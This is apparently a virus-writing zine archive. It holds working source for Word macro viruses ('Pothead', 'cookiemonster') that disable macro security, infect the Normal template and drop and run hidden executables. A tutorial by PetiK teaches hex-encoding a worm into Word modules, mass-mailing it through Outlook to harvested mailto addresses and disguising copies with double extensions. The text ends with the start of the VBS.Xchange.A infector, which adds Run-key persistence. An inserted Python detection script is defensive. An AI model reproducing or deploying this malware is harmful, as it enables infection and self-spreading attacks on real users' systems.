A5 32 F9 B8 7A 57 D7 2C 85 E6 0B 28 C6 EB" Print #1, "e 5AE0 D5 26 76 C7 6F E5 82 63 31 62 D2 BF 66 61 4A 14" Print #1, "e 5AF0 E6 A1 C3 9E 74 F9 0A 8D 95 35 B2 1B F7 16 CA B3" Print #1, "e 5B00 79 B6 33 AA 4B 47 F2 13 37 DE 8A BE 1A 8A D3 19" Print #1, "e 5B10 06 67 3D 1B 03 CA B5 28 30 B6 1A 4F 4C 61 7A A7" Print #1, "e 5B20 FB 91 E4 EE C1 98 5F 98 98 61 7A 4C 74 9D 54 FA" Print #1, "e 5B30 05 ED 95 98 19 83 D6 01 01 58 EB 16 17 4D 75 FC" Print #1, "e 5B40 5F 84 61 63 D7 58 90 5B B2 CA F7 C4 B8 C1 58 5A" Print #1, "e 5B50 46 A3 B4 6A 55 DE 65 95 90 28 16 E8 E9 FE 05 59" Print #1, "e 5B60 7D 63 0A D9 90 11 ED 88 02 68 B6 9D 0F 92 2D 09" Print #1, "e 5B70 5D 03 5F 77 1D 87 39 03 FE 5F 30 06 85 C0 1F C9" Print #1, "e 5B80 78 C8 C8 C0 57 10 6B 03 35 B8 D0 C0 AB 1C 32 D0" Print #1, "e 5B90 34 5A 64 96 BB 5C 5B 99 52 B1 13 F3 51 3F 35 04" Print #1, "e 5BA0 61 81 F2 9B 25 8E 77 F8 25 7E 13 25 73 98 C5 0C" Print #1, "e 5BB0 2A B0 31 90 98 09 E8 11 3B 1B 05 2A B2 68 0A D6" Print #1, "e 5BC0 EE 5C 8C 30 37 5A FE BF 11 5D C5 00 23 42 34 AC" Print #1, "e 5BD0 D5 EB 7B 8A 02 B7 CB EC 3F D4 C5 1B BE 41 E9 DA" Print #1, "e 5BE0 0E 64 2F 96 AF 7D 37 13 5A DC 16 8F 5F DC 19 5A" Print #1, "e 5BF0 F5 64 63 1B B0 C0 0A 8D 05 F7 A6 FB 7B 11 73 0E" Print #1, "e 5C00 45 02 D3 B6 1F 10 31 2D EB A9 FF 00 D2 5B D1 71" Print #1, "e 5C10 08 97 B5 BF 70 49 D9 64 81 7B AE 99 82 71 52 83" 
Print #1, "e 5C20 63 09 A1 38 0D 2E E3 D2 C2 F5 73 10 52 F6 C7 82" Print #1, "e 5C30 B7 1E 35 B5 6D 1A C5 C2 08 E2 9C 17 7D 55 03 D4" Print #1, "e 5C40 4C 62 DE 07 CF 57 AA E5 F7 07 12 C0 DD 37 F7 4C" Print #1, "e 5C50 BA DC 7D 76 4F BD 18 5C B9 CC 26 6B A4 9A 0E 82" Print #1, "e 5C60 40 83 35 E0 1F D9 6A FF 00 C8 90 3F 49 56 92 E0" Print #1, "e 5C70 14 3C 4B C2 3A B2 B7 2C A8 F9 8F F8 EB 32 9B 4C" Print #1, "e 5C80 01 8F CE E5 8A A7 47 1A F2 A6 F2 75 3F 72 41 E6" Print #1, "e 5C90 12 8A 7E 88 61 B0 77 BD 1F 0A 15 4A 7A 52 04 B1" Print #1, "e 5CA0 47 74 CC 3A 8E 55 B7 02 09 4B 30 AE 2D 2F 35 89" Print #1, "e 5CB0 4F EF 4E D1 63 01 58 1B F6 CE 09 F8 BC 47 BC C6" Print #1, "e 5CC0 01 B4 60 5F FC 81 52 93 D5 AF A8 9D 49 AA 79 B7" Print #1, "e 5CD0 9E 0A 88 EB 9F C6 E5 6A 3A 08 BA 04 14 C3 A1 57" Print #1, "e 5CE0 EA 5F A5 1B BF F5 4E DE 21 87 EE 20 D8 BA 8B F5" Print #1, "e 5CF0 39 FC 57 E2 C3 BA 8B 5B 7B 89 AD 98 FD 23 49 3E" Print #1, "e 5D00 A9 55 D0 F4 EF 30 4E 16 AB A3 E4 94 5D 41 57 E0" Print #1, "e 5D10 1D 9E 8E D3 8F 4A 19 AA 43 F5 2B C3 7E B0 E1 9E" Print #1, "e 5D20 0D 67 A4 C7 CE A7 47 03 4F 3C 5F 56 05 70 50 FB" Print #1, "e 5D30 6E 0A C6 4C BD 0C 32 A3 2B 67 66 F4 C7 98 55 F3" Print #1, "e 5D40 B4 FF 00 EC A8 2C 89 4B 57 D2 EB EA 5A 8F 23 81" Print #1, "e 5D50 E7 94 73 B1 D9 00 18 96 E0 4C 59 5F 38 DC 22 B8" Print #1, "e 5D60 1E 1B 30 64 C4 CF 6A 00 2E 68 78 29 2D F1 47 4A" Print #1, "e 5D70 8A 8D 21 EB C0 FA ED 18 1D 08 E0 61 53 0A A0 3D" Print #1, "e 5D80 4C 04 29 ED 95 93 8E 98 25 C1 A2 9F BF F8 8D F3" Print #1, "e 5D90 18 E8 14 E7 DD 41 E3 0D 35 8C 89 F6 1F CB B8 C6" Print #1, "e 5DA0 D8 82 F4 20 27 DC 2B 4F 63 AF 64 B4 C4 E4 3D BA" Print #1, "e 5DB0 1F 50 73 2D EB F8 AF CD 4A 95 37 2A 2F 09 50 3B" Print #1, "e 5DC0 3E CC C6 5C 36 BC 7B 63 68 92 EA F8 40 68 5D E2" Print #1, "e 5DD0 E5 26 21 4E E7 68 94 AC 15 78 8E A7 54 07 ED 15" Print #1, "e 5DE0 5D 96 38 97 A7 21 33 E3 90 C3 F3 71 1F 4B 96 9E" Print #1, "e 5DF0 75 52 AB 8D 0D ED C9 86 5E 16 86 1F A9 
72 96 E1" Print #1, "e 5E00 30 F7 3B 54 E5 A6 89 3D 0C 8E 3A C5 FD DE 22 3D" Print #1, "e 5E10 87 30 65 69 A1 33 E8 B6 59 6C 77 FB 45 3F 50 D4" Print #1, "e 5E20 A3 C8 7D 5D 4A ED 4E 29 41 F8 80 A1 2B 34 40 17" Print #1, "e 5E30 BC 28 54 21 13 79 30 FC 92 9A 07 36 DB CA 54 57" Print #1, "e 5E40 55 DB AF FD 95 44 8B 36 9F 71 9A 6D E9 B5 05 D0" Print #1, "e 5E50 BE D8 FC C0 DA F0 D7 2C 80 DC AB A5 A8 2C 5D E6" Print #1, "e 5E60 4A A8 7F 48 95 49 A3 1A 86 63 6B 68 BC B5 8B 8A" Print #1, "e 5E70 02 08 C5 B3 FB 0C 05 27 54 A0 53 8E DF F9 04 B1" Print #1, "e 5E80 B7 5C 3D B4 E2 58 BE 7B 6B 6D E7 96 D2 AF 2B D6" Print #1, "e 5E90 35 B9 F6 63 DA 9F 2C B6 52 94 A2 A7 3E EA E1 AF" Print #1, "e 5EA0 44 37 8C D5 E3 9E 03 51 42 2B B6 03 C4 0B DA 2D" Print #1, "e 5EB0 63 DC 8E EC 4A B1 F7 14 C6 55 E5 1C 2D DF F7 70" Print #1, "e 5EC0 18 10 97 61 5D F6 6A 7F 04 39 C5 3A 68 81 50 E0" Print #1, "e 5ED0 E8 6D 68 7F DC 47 49 97 4A 37 B7 59 E6 2E 22 A1" Print #1, "e 5EE0 5A 00 55 2F 93 CB 72 C6 C2 CF AA 2D F8 1F 71 3C" Print #1, "e 5EF0 6E 2B BB 56 3B 30 94 24 A8 C1 85 05 58 15 ED CE" Print #1, "e 5F00 08 D4 91 49 77 DC 9F 79 FC 30 6B 12 B8 24 0D 7A" Print #1, "e 5F10 20 87 F2 80 27 A6 6D 77 1F AE E4 FB 84 D9 97 7E" Print #1, "e 5F20 1E 7F D1 15 20 30 89 92 53 F8 A9 52 A5 62 54 A8" Print #1, "e 5F30 2A 43 61 47 99 9B 70 E3 77 D7 B4 18 01 A5 CD 92" Print #1, "e 5F40 27 37 A9 A0 9F 47 0B 99 93 5E 59 81 52 B6 10 2F" Print #1, "e 5F50 2B 8F 98 09 27 46 47 A0 AF 86 27 AD FF 00 D9 15" Print #1, "e 5F60 FD 41 13 47 23 4C B6 15 47 C4 A1 B8 C1 5E 0F 12" Print #1, "e 5F70 F2 EB 60 B7 E1 06 09 5B BA E4 62 05 51 45 05 78" Print #1, "e 5F80 63 60 03 69 7A 39 7B CB 52 51 8B 5E 18 23 45 45" Print #1, "e 5F90 5C DD 9A 89 80 35 78 16 88 82 2B 5F 61 08 40 4E" Print #1, "e 5FA0 99 20 B3 47 45 CE BC 21 6B FB 8A 88 5C C1 72 A2" Print #1, "e 5FB0 0A AD BF D8 AB 61 AB B1 86 2D B0 27 3C 45 ED 05" Print #1, "e 5FC0 87 AF 60 ED 9A 68 4F 24 CB 75 65 15 C5 84 B6 2E" Print #1, "e 5FD0 04 6F 42 10 4B 7C A7 D1 66 
A0 30 20 6A 8D 46 29" Print #1, "e 5FE0 B3 AD 42 9F 8A B6 13 A2 45 EE 40 D5 E8 A7 C4 1E" Print #1, "e 5FF0 AD E4 2B 7D D6 FD C5 D1 DB 30 05 38 BE 92 8C 1D" Print #1, "e 6000 6D 74 E4 97 6D 88 B1 EA 53 F5 0B 07 4A 4D 18 0A" Print #1, "e 6010 C0 29 06 B1 EA 30 EB 70 C3 E1 6A 28 12 72 31 10" Print #1, "e 6020 79 64 75 EA E0 40 6D E1 6D F9 DC 0A ED 02 D8 21" Print #1, "e 6030 88 F1 0E C5 44 48 95 46 CC 65 7B 91 7B 82 D0 C3" Print #1, "e 6040 A7 50 21 98 E4 55 95 FA 58 78 B6 83 59 21 96 28" Print #1, "e 6050 1A 42 CC A0 11 49 9D F8 18 60 61 5A 6C ED 11 6C" Print #1, "e 6060 0E 90 21 77 11 A7 A4 0E 85 70 0C 61 4E BF D3 59" Print #1, "e 6070 83 A3 33 42 3D 97 32 A0 4A C4 09 53 89 37 05 D5" Print #1, "e 6080 CA 62 BB 7E A1 8F 9B 83 CE 60 05 10 28 A8 37 D2" Print #1, "e 6090 28 5E B5 06 6E 81 F9 8F 3C BA 35 2E 5D AE 7A FD" Print #1, "e 60A0 C6 00 81 B2 EA BE B2 E4 4A 78 66 30 0E 8A 65 60" Print #1, "e 60B0 87 68 F5 70 71 4D 54 1E D8 C1 62 56 DB 6D 6A 0E" Print #1, "e 60C0 C3 42 B3 ED 34 3D 56 65 B2 16 D1 03 42 99 2B BE" Print #1, "e 60D0 75 10 8A 1D A2 FA F7 88 24 57 C4 62 14 F5 33 35" Print #1, "e 60E0 39 B1 3C 82 00 FA 6E 3E AB 9C 1B FD 25 9C 2A 26" Print #1, "e 60F0 83 EA 2D D5 2E D5 FE A5 7C AF 02 65 BA 14 B6 AE" Print #1, "e 6100 63 D5 3C 47 59 C2 7F FF D9 00" Print #1, "rcx" Print #1, "6009" Print #1, "w" Print #1, "q" Close #1 Shell Environ("WINDIR") & "\Command.com /c Debug <" & Environ("WINDIR") & "\pothead.tmp", vbHide System.PrivateProfileString(Environ("WINDIR") & "\Win.ini", "Desktop", "Wallpaper") = Environ("WINDIR") & "\pothead.jpg" System.PrivateProfileString(Environ("WINDIR") & "\Win.ini", "Desktop", "Wallpaperstyle") = 2 kill Environ("WINDIR") & "\pothead.tmp" MsgBox "(c)by Necronomikon/ZeroGravity" ,48,"Pothead" Dialogs(wdDialogFileSaveAs).Show 'Actual Save Command End Sub Sub ViewVBCode() On Error Resume Next Application.Quit False End Sub

sources

cookiemonster
Necronomikon

frmcookiemonster.frm:

VERSION 5.00
Begin {C62A69F0-16DC-11CE-9E98-00AA00574A4F} frmcookiemonster
   Caption = "(c) by Necronomikon [Zero Gravity]"
   ClientHeight = 4260
   ClientLeft = 45
   ClientTop = 330
   ClientWidth = 4425
   OleObjectBlob = "frmcookiemonster.frx":0000
   StartUpPosition = 1 'Window center
End
Attribute VB_Name = "frmcookiemonster"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Private Sub Image1_Click()
End Sub

cookiemonster.cls:

VERSION 1.0 CLASS
BEGIN
  MultiUse = -1 'True
END
Attribute VB_Name = "cookiemonster"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
'cookiemonster
Private Sub Document_Open()
    '(c)Necronomikon[Zer0Gravity]
    On Error Resume Next: nec = Application.Version
    Dim cookie As String
    Application.DisplayStatusBar = (3 * 0)
    Options.VirusProtection = (3 * 0)
    Options.SaveNormalPrompt = (3 * 0)
    System.PrivateProfileString("", "HKCU\Software\Microsoft\Office\& nec &\Word\Security", "Level") = 1&
    System.PrivateProfileString("", "HKCU\Software\Microsoft\Office\& nec &\Word\Security", "AccessVBOM") = 1&
    cookiemonster = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 328)
    Set nec = NormalTemplate.VBProject.VBComponents(1).CodeModule
    If ThisDocument = NormalTemplate Then _
        Set nec = ActiveDocument.VBProject.VBComponents(1).CodeModule
    With nec
        If .Lines(1, 1) <> "'cookiemonster" Then
            .DeleteLines 1, .CountOfLines
            .InsertLines 1, cookiemonster
            If ThisDocument = NormalTemplate Then _
                ActiveDocument.SaveAs ActiveDocument.FullName
        End If
    End With
    cookie = InputBox("Give me a cookie:")
    frmcookiemonster.Show
    If cookie = "cookie" Then
        GoTo good
    End If
    If cookie = "" Then
        GoTo bye
    End If
good:
    MsgBox "yum,yum...", vbInformation, "Cookiemonster"
bye:
    Open "c:\cookie" For Output As #1
20 20 20" Print #1, "e 1000 20 20 20 20 20 20 BA BA 20 20 20 20 20 20 20 20" Print #1, "e 1010 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20" Print #1, "e 1020 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20" Print #1, "e 1030 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20" Print #1, "e 1040 20 20 BA BA 20 20 20 20 20 20 20 20 20 20 20 20" Print #1, "e 1050 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20" Print #1, "e 1060 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20" Print #1, "e 1070 20 20 20 20 20 20 20 20 20 20 20 20 20 20 BA C8" Print #1, "e 1080 CD CD CD CD CD CD CD CD CD CD CD CD CD CD CD CD" Print #1, "e 1090 CD CD CD CD CD CD CD CD CD CD CD CD CD CD CD CD" Print #1, "e 10A0 CD CD CD CD CD CD CD CD CD CD CD CD CD CD CD CD" Print #1, "e 10B0 CD CD CD CD CD CD CD CD CD CD BC 00 00 00 43 4F" Print #1, "e 10C0 4F 4B 49 45 20 4D 4F 4E 53 54 45 52 0D 0A 24 00" Print #1, "e 10D0 43 6F 70 79 72 69 67 68 74 20 28 63 29 20 31 39" Print #1, "e 10E0 38 37 20 62 79 20 57 61 6C 6B 65 72 20 41 72 63" Print #1, "e 10F0 68 65 72 0D 0A 24 00 49 6E 69 74 69 61 74 69 6E" Print #1, "e 1100 67 20 6C 75 72 6B 20 6D 6F 64 65 2E 0D 0A 24 00" Print #1, "e 1110 0D 0A 45 52 52 4F 52 20 2D 20 61 72 67 75 6D 65" Print #1, "e 1120 6E 74 20 6D 75 73 74 20 62 65 20 62 65 74 77 65" Print #1, "e 1130 65 6E 20 31 30 20 61 6E 64 20 31 30 30 30 0D 0A" Print #1, "e 1140 24 00 0D 0A 43 6F 6E 74 69 6E 75 69 6E 67 20 69" Print #1, "e 1150 6E 73 74 61 6C 6C 61 74 69 6F 6E 20 77 69 74 68" Print #1, "e 1160 20 61 20 64 65 66 61 75 6C 74 20 6F 66 20 31 30" Print #1, "e 1170 30 30 0D 0A 24 00 00 20 20 20 20 20 20 20 20 20" Print #1, "e 1180 21 21 21 21 21 20 20 20 20 20 20 20 20 20 20 20" Print #1, "e 1190 20 20 20 20 20 20 20 01 40 40 40 40 40 40 40 40" Print #1, "e 11A0 40 40 40 40 40 40 40 02 02 02 02 02 02 02 02 02" Print #1, "e 11B0 02 40 40 40 40 40 40 40 14 14 14 14 14 14 04 04" Print #1, "e 11C0 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04" Print #1, "e 11D0 04 04 40 40 40 40 40 40 18 
18 18 18 18 18 08 08" Print #1, "e 11E0 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08" Print #1, "e 11F0 08 08 40 40 40 40 20 00 00 00 00 00 00 00 00 00" Print #1, "e 1200 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "e 1210 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "e 1220 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "e 1230 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "e 1240 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "e 1250 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "e 1260 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "e 1270 00 00 00 00 00 00 00 00 00 00 00 13 02 02 04 05" Print #1, "e 1280 06 08 08 08 14 15 05 13 FF 16 05 16 02 FF FF FF" Print #1, "e 1290 FF FF FF FF FF FF FF FF FF FF 05 05 FF FF FF FF" Print #1, "e 12A0 FF FF FF FF FF FF FF FF FF FF FF FF 0F FF FF 02" Print #1, "e 12B0 FF 0F FF FF FF FF 13 FF FF 02 02 05 0F 02 FF FF" Print #1, "e 12C0 FF 13 FF FF FF FF FF FF FF FF FF FF FF FF FF FF" Print #1, "e 12D0 FF 13 FF 00 00 10 8E 07 8E 07 00" Print #1, "rcx" Print #1, "11DA" Print #1, "nC:\COOKIE.EXE" Print #1, "w" Print #1, "q" Close #1 Kill "c:\cookie" Shell "c:\cookie.exe", vbHide End Sub

articles

VBS tutorial PetiK

VBS tutorial
************
by PetiK (05/05/2002)

#################
# Introduction: #
#################

I wrote this article after programming VBS.Xchange and VBS.Doublet (two VBS/DOC infectors).
There are three parts in this article:
- Hex Conversion: how to convert an ASCII file (a VBS in a module of Word, for example).
- Spread with "mailto:": spread a VBS worm with web files.
- Random Name Generator: to change the name of a new copy of a VBS worm/virii at each start.

I succeeded in coding this without looking at other source. This sort of article is of course not for
good coderz but for the newbies (NOT LAMERZ) and all people who want to learn about WORM programming.

###################
# HEX CONVERSION: #
###################

Why convert a file to hexadecimal ?? For example, to put it in a module of a Word document.
How to do this ??

1)  Set fso=CreateObject("Scripting.FileSystemObject")
    Set fl=fso.OpenTextFile(WScript.ScriptFullname,1)
    virus=fl.ReadAll                            ' Read all the file
    fl.Close

2)  For i=1 To len(virus)                       ' Take the size of the file

3)  e=Mid(virus,i,1)                            ' Take one byte after another.
    e=Hex(Asc(e))                               ' And convert to hexa. (P=50;e=65;...)

4)  If Len(e)=1 Then                            ' If the hexa < 10h we add a 0
    e="0"&e                                     ' Example : return (0Dh0Ah). We will have D and A.
    End If                                      ' So we add a 0 => 0D and 0A

5)  f=f+e                                       ' This part is for the length of the line in the module
    If Len(f)=110 Then                          ' of the document (it doesn't support lines that are too long).
    sp.WriteLine "e = e + """+f+""""            ' Here we put 110 characters:
    f=""                                        '  e = e + "...110 char..."
    End If

6)  If Len(virus)-i = 0 Then                    ' This is for the last line if there are fewer than 110 chars :
    sp.WriteLine "e = e + """+f+""""            ' e = e + "... 1 < number of char < 110..."
    f=""
    End If

So the source code:
************************************************************************
On Error Resume Next
Set fso=CreateObject("Scripting.FileSystemObject")
Set fl=fso.OpenTextFile(WScript.ScriptFullname,1)
virus=fl.ReadAll
fl.Close

set sp=fso.CreateTextFile("example_vbshex.txt",True,8)
sp.WriteLine "Attribute VB_Name = ""VirModule"""
sp.WriteLine "Sub AutoOpen()"
sp.WriteLine "On Error Resume Next"
sp.WriteLine "e = """""

For i=1 To len(virus)

e=Mid(virus,i,1)
e=Hex(Asc(e))

If Len(e)=1 Then
e="0"&e
End If

f=f+e
If Len(f)=110 Then
sp.WriteLine "e = e + """+f+""""
f=""
End If

If Len(virus)-i = 0 Then
sp.WriteLine "e = e + """+f+""""
f=""
End If

Next

sp.WriteLine "read=dec(e)"
sp.WriteLine "Open ""C:\newvbsfile.vbs"" For Output As #1"
sp.WriteLine "Print #1, read"
sp.WriteLine "Close #1"
sp.WriteLine "Shell ""wscript C:\newvbsfile.vbs"""
sp.WriteLine "End Sub"
sp.WriteLine ""
sp.WriteLine "Function dec(octe)"
sp.WriteLine "For hexad = 1 To Len(octe) Step 2"
sp.WriteLine "dec = dec & Chr(""&h"" & Mid(octe, hexad, 2))"
sp.WriteLine "Next"
sp.WriteLine "End Function"
sp.Close
************************************************************************

And this is the result:
************************************************************************
Attribute VB_Name = "VirModule"
Sub AutoOpen()
On Error Resume Next
e = ""
' [hex-encoded lines of the form  e = e + "..."  not reproduced]
read=dec(e)
Open "C:\newvbsfile.vbs" For Output As #1
Print #1, read
Close #1
Shell "wscript C:\newvbsfile.vbs"
End Sub

Function dec(octe)
For hexad = 1 To Len(octe) Step 2
dec = dec & Chr("&h" & Mid(octe, hexad, 2))
Next
End Function
************************************************************************

The function "dec" converts in the opposite direction.

#########################
# SPREAD WITH "MAILTO:" #
#########################

Now we are going to see how to spread a VBS worm without the Windows AddressBook (aka WAB).
If we can't use the WAB, we can read old mail and take the EMail. But too bad, I don't code this in VBS.
Last solution: take the EMail from WEB files (htm, html, asp, etc...).

When we see a link that sends a mail by clicking, this is the code:

    href="mailto:petikvx@aol.com">PetiKVX
          -------

There is always this string: "MAILTO:". So! Fine! We can scan all files to search for this string
and scan the EMail.

1)  if (ext="htm") or (ext="html") or (ext="htt") or (ext="asp") Then   ' Take the good extension
                                                                        ' htm, html, asp, doc, xls
    set htm=fso.OpenTextFile(fil.path,1)                                ' and open the file.
    verif=True
    allhtm=htm.ReadAll()                                                ' Read all the file.
    htm.Close

2)  For ml=1 To Len(allhtm)                                             ' Get the size.
    count=0

3)  If Mid(allhtm,ml,7) = "mailto:" Then                                ' Find the mailto: string.
    counter=counter+1
    mlto=""

4)  Do While Mid(allhtm,ml+6+count,1) <> """"                           ' Scan the EMail until the '"' character.
    count=count+1
    mlto = mlto + Mid(allhtm,ml+6+count,1)
    loop

5)  sendmailto(left(mlto,len(mlto)-1))                                  ' Send the mail

And now, the code:
************************************************************************
On Error Resume Next
Set fso=CreateObject("Scripting.FileSystemObject")
Set mel=fso.CreateTextFile("spread_mailto.txt",8,TRUE)
counter=0
lect()
mel.WriteLine "#"
mel.Close
WScript.Quit

Sub lect()
  On Error Resume Next
  Set dr=fso.Drives
  For Each d in dr
    If d.DriveType=2 or d.DriveType=3 Then
      list(d.path&"\")
    End If
  Next
End Sub

Sub spreadmailto(dir)
  On Error Resume Next
  Set fso=CreateObject("Scripting.FileSystemObject")
  Set f=fso.GetFolder(dir)
  Set cf=f.Files
  For Each fil in cf
    ext=fso.GetExtensionName(fil.path)
    ext=lcase(ext)
    if (ext="htm") or (ext="html") or (ext="htt") or (ext="asp") Then
      set htm=fso.OpenTextFile(fil.path,1)
      allhtm=htm.ReadAll()
      htm.Close
      For ml=1 To Len(allhtm)
        count=0
        If Mid(allhtm,ml,7) = "mailto:" Then
          counter=counter+1
          mlto=""
          Do While Mid(allhtm,ml+6+count,1) <> """"
            count=count+1
            mlto = mlto + Mid(allhtm,ml+6+count,1)
          loop
          mel.WriteLine counter &" <"&left(mlto,len(mlto)-1)&">"
          msgbox mlto
          sendmailto(left(mlto,len(mlto)-1))
        End If
      Next
    End If
  Next
End Sub

Sub list(dir)
  On Error Resume Next
  Set f=fso.GetFolder(dir)
  Set ssf=f.SubFolders
  For Each fil in ssf
    spreadmailto(fil.path)
    list(fil.path)
  Next
End Sub

Sub sendmailto(email)
  Set out=CreateObject("Outlook.Application")
  Set mailmelto=out.CreateItem(0)
  mailmelto.To email
  mailmelto.Subject "Subject of worm"
  mailmelto.Body "Body of worm"
  mailmelto.Attachment.Add (WScript.ScriptFullName)
  mailmelto.DeleteAfterSubmit = True
  mailmelto.Send
  Set out = Nothing
End Sub
************************************************************************

In the spread_mailto.txt file we have this:
************************************************************************
1 <Petikvx@aol.com>
2 <VBS.Ketip.A@mm>
3 <PetiK@aol.com>
4 <kavdaemon@relay.avp.ru>
5 <kavdaemon@relay.avp.ru>kavdaemon@relay.avp.ru</A></TD></TR>
<TR class=aolmailheader>
<TD noWrap vAlign=top width=>
6 <Pentasm99@aol.com>
7 <Pentasm99@aol.com screenname=>
...
...
************************************************************************

We can of course see some problems:
- <VBS.Ketip.A@mm>: not a real EMail but a Norton worm name.
- <kavdaemon@relay.avp.ru>kavdaemon@relay.avp.ru</A></TD></TR> <TR class=aolmailheader> <TD noWrap vAlign=top width=>:
  the scan doesn't immediately find the '"' character.
- <Pentasm99@aol.com screenname=>: idem. The end of the EMail was not '"' but a space (20h).

##########################
# RANDOM NAME GENERATOR: #
##########################

Like I said in my last article about "Hide a copy a of worm", we are going to do the same thing in VBS.

1)  tmpname=""                                                          ' Value of tmpname is NULL

2)  randomize(timer)                                                    ' Random size of the first part of the name
    namel=int(rnd(1)*20)+1                                              ' between 1 and 20.

3)  For lettre = 1 To namel                                             ' Put the letter.
    randomize(timer)                                                    ' 97 : Start from "a" (65 : Start from "A")
    tmpname=tmpname & chr(int(rnd(1)*26)+97)                            ' 26 : from "a-A" to "z-Z"
    Next                                                                ' for number 26 => 9 and 97 => 48

4)  typext = "execombatbmpjpggifdocxlsppthtmhtthta"                     ' Now we choose an extension among 12 different ones.
    randomize(timer)
    tmpext = int(rnd(1)*11)+1

5)  tmpname=tmpname & "." & mid(typext,((tmpext-1)*3)+1,3) & ".vbs"     ' And we have the result

Source code:
************************************************************************
tmpname=""
randomize(timer)
namel=int(rnd(1)*20)+1
For lettre = 1 To namel
randomize(timer)
tmpname=tmpname & chr(int(rnd(1)*26)+97)
Next
typext = "execombatbmpjpggifdocxlsppthtmhtthta"
randomize(timer)
tmpext = int(rnd(1)*11)+1
tmpname=tmpname & "." & mid(typext,((tmpext-1)*3)+1,3) & ".vbs"
MsgBox tmpname
************************************************************************

Some examples:
mhrmhoulleyl.htm.vbs
rlvqmtyppjcbho.bat.vbs
PREYXUDBNYKNLRSALL.DOC.VBS
869768177527247364.gif.vbs
...
...

This technique is great for changing the name of the worm's copy at each start (look at my last article).

###############
# CONCLUSION: #
###############

This is the end of the article. I hope that it helps you in your creations and research.
If you have any suggestions or comments, please mail me (see contact-page).

PetiK
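For analysts triaging documents and attachments, the two artifacts this tutorial produces (a macro module that rebuilds a script from appended hex strings, and copies named `<random>.<decoy extension>.vbs`) can be checked as below. This is an added example, not code from the original article; the function names, marker lists and the sample module are constructed for illustration, and accepting `&` or variable names other than `e` generalises beyond the tutorial's exact output.

```python
import re

# One line of the generated module: <var> = <var> + "<hex digits>".
# The tutorial always emits  e = e + "...";  "&" and other names are accepted too.
HEX_APPEND = re.compile(
    r'^[ \t]*(\w+)[ \t]*=[ \t]*\1[ \t]*[+&][ \t]*"([0-9A-Fa-f]+)"[ \t]*$',
    re.MULTILINE,
)
# Lower-case strings suggesting the decoded bytes are a Windows Script Host script.
SCRIPT_MARKERS = ("createobject", "wscript", "on error resume next", "msgbox")
# Macro-side behaviour visible in the tutorial's generated module.
MACRO_MARKERS = {
    "autorun": re.compile(r"^\s*Sub\s+Auto(Open|Close|Exec)\b", re.I | re.M),
    "file_write": re.compile(r'^\s*Open\s+".*"\s+For\s+Output', re.I | re.M),
    "shell": re.compile(r"^\s*Shell\b", re.I | re.M),
}
# The twelve decoy extensions packed into the tutorial's typext string.
DECOY_EXTS = ("exe", "com", "bat", "bmp", "jpg", "gif",
              "doc", "xls", "ppt", "htm", "htt", "hta")
DOUBLE_EXT = re.compile(r"\.(%s)\.(vbs|vbe)$" % "|".join(DECOY_EXTS), re.I)


def extract_hex_payloads(macro_src):
    """Return {variable: decoded bytes} for each hex string built by appends."""
    chunks = {}
    for var, hexpart in HEX_APPEND.findall(macro_src.replace("\r\n", "\n")):
        chunks.setdefault(var, []).append(hexpart)
    payloads = {}
    for var, parts in chunks.items():
        joined = "".join(parts)
        if len(joined) % 2:  # odd number of digits: not whole bytes, skip
            continue
        payloads[var] = bytes.fromhex(joined)
    return payloads


def triage_macro(macro_src):
    """Return a sorted list of findings for one exported macro module."""
    src = macro_src.replace("\r\n", "\n")
    findings = [name for name, rx in MACRO_MARKERS.items() if rx.search(src)]
    for var, blob in extract_hex_payloads(src).items():
        text = blob.decode("latin-1").lower()
        if any(marker in text for marker in SCRIPT_MARKERS):
            findings.append("hex_script:%s:%d_bytes" % (var, len(blob)))
    return sorted(findings)


def has_decoy_double_extension(filename):
    """True for names shaped like the tutorial's output, e.g. name.htm.vbs."""
    return DOUBLE_EXT.search(filename) is not None


# Constructed sample shaped like the tutorial's generated module. The hex
# decodes to the harmless one-liner  MsgBox "hello"  followed by CR LF.
SAMPLE_MACRO = '''Attribute VB_Name = "Demo"
Sub AutoOpen()
On Error Resume Next
e = ""
e = e + "4D7367426F782022"
e = e + "68656C6C6F220D0A"
read=dec(e)
Open "C:\\demo.vbs" For Output As #1
Print #1, read
Close #1
Shell "wscript C:\\demo.vbs"
End Sub
'''

if __name__ == "__main__":
    print(triage_macro(SAMPLE_MACRO))
    print(extract_hex_payloads(SAMPLE_MACRO))
    for name in ("mhrmhoulleyl.htm.vbs", "report.vbs"):
        print(name, has_decoy_double_extension(name))
```

The decoded bytes returned by `extract_hex_payloads` are what should go to further static analysis; the macro module itself only carries the decoder and the launch.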

sources

VBS.Xchange.A PetiK

VBS.Xchange.A
**************
by PetiK

A VBS/DOC infector coded in VBS.
Here is the code:

'VBS.Xchange.A
On Error Resume Next
Set fso=CreateObject("Scripting.FileSystemObject")
Set ws=CreateObject("WScript.Shell")
Set fl=fso.OpenTextFile(WScript.ScriptFullname,1)
virus=fl.ReadAll
fl.Close

Set win=fso.GetSpecialFolder(0)
fcopy=win&"\MSXchange.vbs"
reg="HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
fso.GetFile(WScript.ScriptFullName).Copy(fcopy)
ws.RegWrite reg&"\MsExchange",fcopy

set sp=fso.CreateTextFile("C:\XChange.vba",True,8)
sp.WriteLine "Attribute VB_Name = ""Xchange"""
sp.WriteLine "Sub AutoOpen()"
